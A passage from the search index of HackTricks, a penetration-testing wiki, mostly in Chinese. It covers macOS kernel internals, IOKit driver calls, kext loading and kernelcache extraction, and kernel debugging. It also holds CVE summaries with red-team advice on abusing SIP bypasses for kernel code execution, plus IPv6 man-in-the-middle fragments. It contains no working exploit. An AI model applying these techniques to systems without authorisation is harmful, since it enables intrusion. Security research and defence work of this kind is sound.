使用ICMPv6重定向或“数据包过大”消息来操纵路由。 攻击移动IPv6(通常需要禁用IPSec)。 设置恶意DHCPv6服务器。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 Man-in-the-Middle (MitM) Attacks","id":"216","title":"IPv6 Man-in-the-Middle (MitM) Attacks"},"2160":{"body":"XNU 内核 还 包含 大量来自 FreeBSD 项目的代码。这些代码 与 Mach 一起在内核中运行 ,在同一地址空间中。然而,XNU 中的 FreeBSD 代码可能与原始 FreeBSD 代码有显著不同,因为需要进行修改以确保其与 Mach 的兼容性。FreeBSD 贡献了许多内核操作,包括: 进程管理 信号处理 基本安全机制,包括用户和组管理 系统调用基础设施 TCP/IP 堆栈和套接字 防火墙和数据包过滤 由于 BSD 和 Mach 之间的不同概念框架,理解它们之间的交互可能很复杂。例如,BSD 使用进程作为其基本执行单元,而 Mach 基于线程操作。这种差异在 XNU 中通过 将每个 BSD 进程与一个包含恰好一个 Mach 线程的 Mach 任务关联 来调和。当使用 BSD 的 fork() 系统调用时,内核中的 BSD 代码使用 Mach 函数来创建任务和线程结构。 此外, Mach 和 BSD 各自维护不同的安全模型 : Mach 的 安全模型基于 端口权限 ,而 BSD 的安全模型基于 进程所有权 。这两种模型之间的差异偶尔会导致本地特权提升漏洞。除了典型的系统调用外,还有 Mach 陷阱,允许用户空间程序与内核交互 。这些不同的元素共同构成了 macOS 内核的多面性混合架构。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » BSD","id":"2160","title":"BSD"},"2161":{"body":"I/O Kit 是 XNU 内核中的一个开源、面向对象的 设备驱动程序框架 ,处理 动态加载的设备驱动程序 。它允许在内核中动态添加模块化代码,支持多种硬件。 macOS IOKit","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » I/O Kit - 驱动程序","id":"2161","title":"I/O Kit - 驱动程序"},"2162":{"body":"macOS IPC - Inter Process Communication","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » IPC - 进程间通信","id":"2162","title":"IPC - 进程间通信"},"2163":{"body":"macOS 对加载内核扩展(.kext) 非常严格 ,因为代码将以高权限运行。实际上,默认情况下几乎不可能(除非找到绕过方法)。 在以下页面中,您还可以看到如何恢复 macOS 在其 kernelcache 中加载的 .kext: macOS Kernel Extensions & Debugging","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS 内核扩展","id":"2163","title":"macOS 内核扩展"},"2164":{"body":"macOS 创建了系统扩展,而不是使用内核扩展,提供用户级 API 与内核交互。这样,开发人员可以避免使用内核扩展。 macOS System Extensions","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS 系统扩展","id":"2164","title":"macOS 系统扩展"},"2165":{"body":"The Mac Hacker\'s Handbook https://taomm.org/vol1/analysis.html tip 学习和实践 AWS 
黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » 参考文献","id":"2165","title":"参考文献"},"2166":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » macOS IOKit","id":"2166","title":"macOS IOKit"},"2167":{"body":"I/O Kit 是一个开源的面向对象的 设备驱动框架 ,位于 XNU 内核中,处理 动态加载的设备驱动程序 。它允许在运行时将模块化代码添加到内核中,支持多种硬件。 IOKit 驱动程序基本上会 从内核导出函数 。这些函数参数 类型 是 预定义 的并经过验证。此外,类似于 XPC,IOKit 只是 Mach 消息 之上的另一层。 IOKit XNU 内核代码 由 Apple 在 https://github.com/apple-oss-distributions/xnu/tree/main/iokit 开源。此外,用户空间的 IOKit 组件也开源 https://github.com/opensource-apple/IOKitUser 。 然而, 没有 IOKit 驱动程序 是开源的。无论如何,驱动程序的发布有时可能会附带符号,使其更易于调试。查看如何 从固件获取驱动程序扩展这里 。 它是用 C++ 编写的。您可以使用以下命令获取去除修饰的 C++ 符号: bash # Get demangled symbols\\nnm -C com.apple.driver.AppleJPEGDriver # Demangled symbols from stdin\\nc++filt\\n__ZN16IOUserClient202222dispatchExternalMethodEjP31IOExternalMethodArgumentsOpaquePK28IOExternalMethodDispatch2022mP8OSObjectPv\\nIOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) caution IOKit 暴露的函数 可能在客户端尝试调用函数时执行 额外的安全检查 ,但请注意,应用程序通常受到 沙箱 的 限制 ,只能与特定的 IOKit 函数进行交互。","breadcrumbs":"macOS Security & Privilege 
Escalation » macOS Kernel & System Extensions » macOS IOKit » 基本信息","id":"2167","title":"基本信息"},"2168":{"body":"在 macOS 中,它们位于: /System/Library/Extensions 内置于 OS X 操作系统的 KEXT 文件。 /Library/Extensions 由第三方软件安装的 KEXT 文件 在 iOS 中,它们位于: /System/Library/Extensions bash #Use kextstat to print the loaded drivers\\nkextstat\\nExecuting: /usr/bin/kmutil showloaded\\nNo variant specified, falling back to release\\nIndex Refs Address Size Wired Name (Version) UUID \\n1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5>\\n10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> 直到第9个,列出的驱动程序是 加载在地址0 。这意味着这些不是实际的驱动程序,而是 内核的一部分,无法卸载 。 为了找到特定的扩展,您可以使用: bash kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id\\nkextfind -bundle-id -substring IOR #Search by substring in bundle-id 要加载和卸载内核扩展,请执行: bash kextload com.apple.iokit.IOReportFamily\\nkextunload com.apple.iokit.IOReportFamily","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 驱动程序","id":"2168","title":"驱动程序"},"2169":{"body":"IORegistry 是 macOS 和 iOS 中 IOKit 框架的一个关键部分,作为表示系统硬件配置和状态的数据库。它是一个 层次化的对象集合,表示系统上加载的所有硬件和驱动程序 及其相互关系。 您可以使用 cli ioreg 从控制台检查 IORegistry(对 iOS 特别有用)。 bash ioreg -l 
#List all\\nioreg -w 0 #Not cut lines\\nioreg -p #Check other plane 您可以从 Xcode 附加工具 下载 IORegistryExplorer ,并通过 图形 界面检查 macOS IORegistry 。 在 IORegistryExplorer 中,“平面”用于组织和显示 IORegistry 中不同对象之间的关系。每个平面代表特定类型的关系或系统硬件和驱动程序配置的特定视图。以下是您可能在 IORegistryExplorer 中遇到的一些常见平面: IOService 平面 :这是最一般的平面,显示代表驱动程序和 nubs(驱动程序之间的通信通道)的服务对象。它显示这些对象之间的提供者-客户端关系。 IODeviceTree 平面 :该平面表示设备与系统之间的物理连接。它通常用于可视化通过 USB 或 PCI 等总线连接的设备层次结构。 IOPower 平面 :以电源管理的方式显示对象及其关系。它可以显示哪些对象影响其他对象的电源状态,对于调试与电源相关的问题非常有用。 IOUSB 平面 :专注于 USB 设备及其关系,显示 USB 集线器和连接设备的层次结构。 IOAudio 平面 :该平面用于表示音频设备及其在系统中的关系。 ...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » IORegistry","id":"2169","title":"IORegistry"},"217":{"body":"","breadcrumbs":"Pentesting Network » Pentesting IPv6 » Identifying IPv6 Addresses in the eild","id":"217","title":"Identifying IPv6 Addresses in the eild"},"2170":{"body":"以下代码连接到 IOKit 服务 \\"YourServiceNameHere\\" 并调用选择器 0 内的函数。为此: 首先调用 IOServiceMatching 和 IOServiceGetMatchingServices 来获取服务。 然后通过调用 IOServiceOpen 建立连接。 最后调用一个函数,使用 IOConnectCallScalarMethod 指定选择器 0(选择器是您要调用的函数分配的数字)。 objectivec #import \\n#import int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Get a reference to the service using its name\\nCFMutableDictionaryRef matchingDict = IOServiceMatching(\\"YourServiceNameHere\\");\\nif (matchingDict == NULL) {\\nNSLog(@\\"Failed to create matching dictionary\\");\\nreturn -1;\\n} // Obtain an iterator over all matching services\\nio_iterator_t iter;\\nkern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);\\nif (kr != KERN_SUCCESS) {\\nNSLog(@\\"Failed to get matching services\\");\\nreturn -1;\\n} // Get a reference to the first service (assuming it exists)\\nio_service_t service = IOIteratorNext(iter);\\nif (!service) {\\nNSLog(@\\"No matching service found\\");\\nIOObjectRelease(iter);\\nreturn -1;\\n} // Open a connection to the service\\nio_connect_t connect;\\nkr = 
IOServiceOpen(service, mach_task_self(), 0, &connect);\\nif (kr != KERN_SUCCESS) {\\nNSLog(@\\"Failed to open service\\");\\nIOObjectRelease(service);\\nIOObjectRelease(iter);\\nreturn -1;\\n} // Call a method on the service\\n// Assume the method has a selector of 0, and takes no arguments\\nkr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL);\\nif (kr != KERN_SUCCESS) {\\nNSLog(@\\"Failed to call method\\");\\n} // Cleanup\\nIOServiceClose(connect);\\nIOObjectRelease(service);\\nIOObjectRelease(iter);\\n}\\nreturn 0;\\n} 有 其他 函数可以用来调用 IOKit 函数,除了 IOConnectCallScalarMethod ,还有 IOConnectCallMethod 、 IOConnectCallStructMethod ...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 驱动程序通信代码示例","id":"2170","title":"驱动程序通信代码示例"},"2171":{"body":"您可以从 固件映像 (ipsw) 中获取这些。例如,将其加载到您喜欢的反编译器中。 您可以开始反编译 externalMethod 函数,因为这是接收调用并调用正确函数的驱动函数: 那个可怕的调用去掉混淆后的意思是: cpp IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) 注意在之前的定义中缺少了 self 参数,好的定义应该是: cpp IOUserClient2022::dispatchExternalMethod(self, unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) 实际上,您可以在 https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388 找到真实的定义: cpp IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgumentsOpaque *arguments,\\nconst IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount,\\nOSObject * target, void * reference) 使用此信息,您可以重写 Ctrl+Right -> Edit function signature 并设置已知类型: 新的反编译代码将如下所示: 在下一步中,我们需要定义 IOExternalMethodDispatch2022 结构体。它是开源的,您可以在 https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176 中找到,您可以定义它: 现在,跟随 (IOExternalMethodDispatch2022 
*)&sIOExternalMethodArray,您可以看到很多数据: 将数据类型更改为 IOExternalMethodDispatch2022: 更改后: 现在我们知道这里有一个 7 个元素的数组 (检查最终的反编译代码),点击创建一个 7 个元素的数组: 数组创建后,您可以看到所有导出的函数: tip 如果您记得,从用户空间 调用 一个 导出 函数时,我们不需要调用函数的名称,而是 选择器编号 。在这里,您可以看到选择器 0 是函数 initializeDecoder ,选择器 1 是 startDecoder ,选择器 2 是 initializeEncoder ... tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 反向工程驱动入口点","id":"2171","title":"反向工程驱动入口点"},"2172":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » macOS 内核扩展与调试","id":"2172","title":"macOS 内核扩展与调试"},"2173":{"body":"内核扩展(Kexts)是 以 .kext 为扩展名的包 ,直接 加载到 macOS 内核空间 ,为主操作系统提供额外功能。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 基本信息","id":"2173","title":"基本信息"},"2174":{"body":"从 macOS Catalina (10.15) 开始,Apple 将大多数遗留 KPI 标记为 废弃 ,并引入了 系统扩展和 DriverKit 框架,这些框架在 用户空间 中运行。从 macOS Big Sur (11) 开始,操作系统将 拒绝加载 依赖于废弃 KPI 的第三方 kext,除非机器以 降低安全性 模式启动。在 Apple Silicon 上,启用 kext 还要求用户: 重启进入 恢复 → 启动安全实用工具 。 选择 降低安全性 并勾选 “允许用户管理来自已识别开发者的内核扩展” 。 重启并在 系统设置 → 隐私与安全 中批准 kext。 使用 DriverKit/系统扩展编写的用户空间驱动程序显著 减少攻击面 ,因为崩溃或内存损坏被限制在沙盒进程中,而不是内核空间。 📝 从 macOS Sequoia (15) 开始,Apple 完全移除了几个遗留的网络和 USB KPI – 唯一向前兼容的解决方案是迁移到系统扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 废弃状态与 DriverKit / 系统扩展","id":"2174","title":"废弃状态与 DriverKit / 系统扩展"},"2175":{"body":"显然,这么强大以至于 加载内核扩展 是 复杂的 。内核扩展必须满足以下 要求 才能被加载: 当 进入恢复模式 时,必须 允许加载内核扩展 : 内核扩展必须 使用内核代码签名证书签名 ,该证书只能由 Apple 授予 。Apple 将详细审核公司及其所需原因。 内核扩展还必须 经过公证 ,Apple 将能够检查其是否含有恶意软件。 然后, root 用户是唯一可以 加载内核扩展 的人,包内的文件必须 属于 root 。 在上传过程中,包必须准备在 受保护的非 root 位置 :/Library/StagedExtensions(需要 com.apple.rootless.storage.KernelExtensionManagement 授权)。 最后,在尝试加载时,用户将 收到确认请求 ,如果接受,计算机必须 重启 以加载它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 要求","id":"2175","title":"要求"},"2176":{"body":"在 Catalina 中是这样的:有趣的是, 验证 过程发生在 用户空间 。然而,只有具有 com.apple.private.security.kext-management 授权的应用程序可以 请求内核加载扩展 :kextcache、kextload、kextutil、kextd、syspolicyd kextutil cli 启动 加载扩展的 验证 过程 它将通过使用 Mach 服务 与 kextd 进行通信。 kextd 将检查多个事项,例如 签名 它将与 syspolicyd 进行通信以 检查 扩展是否可以 加载 。 syspolicyd 将 提示 用户 如果扩展尚未被加载。 syspolicyd 将结果报告给 
kextd kextd 最终将能够 告诉内核加载 扩展 如果 kextd 不可用, kextutil 可以执行相同的检查。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 加载过程","id":"2176","title":"加载过程"},"2177":{"body":"kextstat 是历史工具,但在最近的 macOS 版本中已 废弃 。现代接口是 kmutil : bash # List every extension currently linked in the kernel, sorted by load address\\nsudo kmutil showloaded --sort # Show only third-party / auxiliary collections\\nsudo kmutil showloaded --collection aux # Unload a specific bundle\\nsudo kmutil unload -b com.example.mykext 旧语法仍可供参考: bash # (Deprecated) Get loaded kernel extensions\\nkextstat # (Deprecated) Get dependencies of the kext number 22\\nkextstat | grep \\" 22 \\" | cut -c2-5,50- | cut -d \'(\' -f1 kmutil inspect 还可以用于 转储内核集合 (KC) 的内容或验证 kext 是否解析所有符号依赖: bash # List fileset entries contained in the boot KC\\nkmutil inspect -B /System/Library/KernelCollections/BootKernelExtensions.kc --show-fileset-entries # Check undefined symbols of a 3rd party kext before loading\\nkmutil libraries -p /Library/Extensions/FancyUSB.kext --undef-symbols","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 枚举与管理(已加载的 kexts)","id":"2177","title":"枚举与管理(已加载的 kexts)"},"2178":{"body":"caution 尽管内核扩展预计位于 /System/Library/Extensions/ 中,但如果你去这个文件夹,你 不会找到任何二进制文件 。这是因为 kernelcache ,为了反向工程一个 .kext,你需要找到获取它的方法。 kernelcache 是 XNU 内核的预编译和预链接版本 ,以及必要的设备 驱动程序 和 内核扩展 。它以 压缩 格式存储,并在启动过程中解压到内存中。kernelcache 通过提供一个准备就绪的内核和关键驱动程序的版本,促进了 更快的启动时间 ,减少了在启动时动态加载和链接这些组件所需的时间和资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » Kernelcache","id":"2178","title":"Kernelcache"},"2179":{"body":"在 iOS 中,它位于 /System/Library/Caches/com.apple.kernelcaches/kernelcache ,在 macOS 中你可以通过以下命令找到它: find / -name \\"kernelcache\\" 2>/dev/null 在我的 macOS 中,我找到了它在: 
/System/Volumes/Preboot/1BAEB4B5-180B-4C46-BD53-51152B7D92DA/boot/DAD35E7BC0CDA79634C20BD1BD80678DFB510B2AAD3D25C1228BB34BCD0A711529D3D571C93E29E1D0C1264750FA043F/System/Library/Caches/com.apple.kernelcaches/kernelcache IMG4 IMG4 文件格式是苹果在其 iOS 和 macOS 设备中用于安全 存储和验证固件 组件(如 kernelcache )的容器格式。IMG4 格式包括一个头部和几个标签,这些标签封装了不同的数据片段,包括实际的有效载荷(如内核或引导加载程序)、签名和一组清单属性。该格式支持加密验证,允许设备在执行固件组件之前确认其真实性和完整性。 它通常由以下组件组成: 有效载荷 (IM4P) : 通常被压缩(LZFSE4, LZSS, …) 可选加密 清单 (IM4M) : 包含签名 额外的键/值字典 恢复信息 (IM4R) : 也称为 APNonce 防止某些更新的重放 可选:通常不会找到 解压 Kernelcache: bash # img4tool (https://github.com/tihmstar/img4tool)\\nimg4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e # pyimg4 (https://github.com/m1stadev/PyIMG4)\\npyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » Local Kerlnelcache","id":"2179","title":"Local Kerlnelcache"},"218":{"body":"一种查找可能与IPv6地址相关的子域的方法是利用搜索引擎。例如,使用查询模式ipv6.*可能是有效的。具体来说,可以在Google中使用以下搜索命令: bash site:ipv6./","breadcrumbs":"Pentesting Network » Pentesting IPv6 » Exploring Subdomains","id":"218","title":"Exploring Subdomains"},"2180":{"body":"KernelDebugKit Github 在 https://github.com/dortania/KdkSupportPkg/releases 可以找到所有的内核调试工具包。你可以下载它,挂载它,用 Suspicious Package 工具打开它,访问 .kext 文件夹并 提取它 。 使用以下命令检查符号: bash nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l theapplewiki.com , ipsw.me , theiphonewiki.com 有时,Apple 会发布带有 symbols 的 kernelcache 。您可以通过这些页面上的链接下载一些带有符号的固件。固件将包含 kernelcache 以及其他文件。 要 extract 文件,首先将扩展名从 .ipsw 更改为 .zip 并 unzip 它。 提取固件后,您将获得一个文件,如: kernelcache.release.iphone14 。它是 IMG4 格式,您可以使用以下工具提取有趣的信息: pyimg4 : bash pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e img4tool : bash img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System 
Extensions » macOS Kernel Extensions & Debugging » 下载","id":"2180","title":"下载"},"2181":{"body":"检查 kernelcache 是否具有符号 bash nm -a kernelcache.release.iphone14.e | wc -l 通过这个,我们现在可以 提取所有扩展 或 您感兴趣的扩展: bash # List all extensions\\nkextex -l kernelcache.release.iphone14.e\\n## Extract com.apple.security.sandbox\\nkextex -e com.apple.security.sandbox kernelcache.release.iphone14.e # Extract all\\nkextex_all kernelcache.release.iphone14.e # Check the extension for symbols\\nnm -a binaries/com.apple.security.sandbox | wc -l","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » Inspecting kernelcache","id":"2181","title":"Inspecting kernelcache"},"2182":{"body":"年份 CVE 摘要 2024 CVE-2024-44243 storagekitd 中的逻辑缺陷允许 root 攻击者注册一个恶意文件系统包,最终加载一个 未签名的 kext , 绕过系统完整性保护 (SIP) 并启用持久性 rootkit。已在 macOS 14.2 / 15.2 中修补。 2021 CVE-2021-30892 ( Shrootless ) 带有 com.apple.rootless.install 权限的安装守护进程可能被滥用以执行任意后安装脚本,禁用 SIP 并加载任意 kext。 红队员的要点 寻找与磁盘仲裁、安装程序或 Kext 管理交互的有权限的守护进程 (codesign -dvv /path/bin | grep entitlements)。 滥用 SIP 绕过几乎总是授予加载 kext 的能力 → 内核代码执行 。 防御提示 保持 SIP 启用 ,监控来自非 Apple 二进制文件的 kmutil load/kmutil create -n aux 调用,并对任何写入 /Library/Extensions 的操作发出警报。端点安全事件 ES_EVENT_TYPE_NOTIFY_KEXTLOAD 提供近实时的可见性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 最近的漏洞与利用技术","id":"2182","title":"最近的漏洞与利用技术"},"2183":{"body":"苹果推荐的工作流程是构建一个与正在运行的版本匹配的 内核调试工具包 (KDK) ,然后通过 KDP (内核调试协议) 网络会话附加 LLDB 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 调试 macOS 内核与 kexts","id":"2183","title":"调试 macOS 内核与 kexts"},"2184":{"body":"bash # Create a symbolication bundle for the latest panic\\nsudo kdpwrit dump latest.kcdata\\nkmutil analyze-panic latest.kcdata -o ~/panic_report.txt","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel 
Extensions & Debugging » 一次性本地调试 panic","id":"2184","title":"一次性本地调试 panic"},"2185":{"body":"下载并安装目标机器的确切 KDK 版本。 使用 USB-C 或 Thunderbolt 电缆 将目标 Mac 和主机 Mac 连接起来。 在 目标 : bash sudo nvram boot-args=\\"debug=0x100 kdp_match_name=macbook-target\\"\\nreboot 在 主机 上: bash lldb\\n(lldb) kdp-remote \\"udp://macbook-target\\"\\n(lldb) bt # get backtrace in kernel context","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 从另一台 Mac 进行实时远程调试","id":"2185","title":"从另一台 Mac 进行实时远程调试"},"2186":{"body":"bash # Identify load address of the kext\\nADDR=$(kmutil showloaded --bundle-identifier com.example.driver | awk \'{print $4}\') # Attach\\nsudo lldb -n kernel_task -o \\"target modules load --file /Library/Extensions/Example.kext/Contents/MacOS/Example --slide $ADDR\\" ℹ️ KDP 仅暴露一个 只读 接口。对于动态插桩,您需要在磁盘上修补二进制文件,利用 内核函数钩子 (例如 mach_override)或将驱动程序迁移到 虚拟机监控程序 以实现完全的读/写。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 将 LLDB 附加到特定加载的 kext","id":"2186","title":"将 LLDB 附加到特定加载的 kext"},"2187":{"body":"DriverKit Security – Apple Platform Security Guide Microsoft Security Blog – Analyzing CVE-2024-44243 SIP bypass tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » References","id":"2187","title":"References"},"2188":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » macOS Kernel Vulnerabilities","id":"2188","title":"macOS Kernel Vulnerabilities"},"2189":{"body":"在本报告中 解释了几个漏洞,这些漏洞允许通过软件更新程序来破坏内核。 PoC 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » Pwning OTA","id":"2189","title":"Pwning OTA"},"219":{"body":"要识别 IPv6 地址,可以查询某些 DNS 记录类型: AXFR :请求完整的区域传输,可能会揭示广泛的 DNS 记录。 AAAA :直接查找 IPv6 地址。 ANY :一个广泛的查询,返回所有可用的 DNS 记录。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 利用 DNS 查询","id":"219","title":"利用 DNS 查询"},"2190":{"body":"苹果在2024年3月修复了两个在iOS和macOS上被积极利用的内存损坏漏洞(在macOS 14.4/13.6.5/12.7.4中修复)。 CVE-2024-23225 – 内核 • XNU虚拟内存子系统中的越界写入允许一个无特权进程在内核地址空间中获得任意的读/写权限,绕过PAC/KTRR。 • 通过一个精心制作的XPC消息从用户空间触发,该消息溢出libxpc中的缓冲区,然后在解析消息时转入内核。 CVE-2024-23296 – RTKit • 苹果硅RTKit(实时协处理器)中的内存损坏。 • 观察到的利用链使用CVE-2024-23225进行内核读/写,并使用CVE-2024-23296逃离安全协处理器沙箱并禁用PAC。 补丁级别检测: bash sw_vers # ProductVersion 14.4 or later is patched\\nauthenticate sudo sysctl kern.osversion # 23E214 or later for Sonoma 如果无法升级,请通过禁用易受攻击的服务来减轻风险: bash launchctl disable system/com.apple.analyticsd\\nlaunchctl disable system/com.apple.rtcreportingd","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 
